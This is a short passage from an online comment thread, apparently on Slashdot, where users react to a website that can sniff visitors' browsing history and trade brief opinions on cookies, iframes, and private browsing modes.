Anonymous Coward | more than 5 years ago | (#28324841)

It won't do much good to steal a cookie for login info. You would have to be a complete moron to set login cookies that contained anything more than a hash, which would be worthless to anyone stealing it.

No more "cool" stuff, please. (1)

Waccoon (1186667) | more than 5 years ago | (#28324511)

I can disable JavaScript, Java, cookies, and password memorization. That's great. Now, please let me disable the most useless feature of all: iframes.

Oh, wait... then web developers will inject 3rd party web code directly into the main document with AJAX, which is even worse.

Ingenious (1)

pixelot (1539093) | more than 5 years ago | (#28324763)

This is pretty sweet, albeit scary.

Blocked by InPrivate (-1, Troll)

Anonymous Coward | more than 5 years ago | (#28324911)

If you care about your history being sniffed like this, you can just use IE8's InPrivate mode.

On the other hand (1)

bytesex (112972) | more than 5 years ago | (#28325159)

Maybe one can use this site to their advantage. Obviously, the owners know something we know not - popularity of websites. If you can 'play' the browser at the user end, you can have a look into their database. See what they're searching for and how. It cuts both ways.
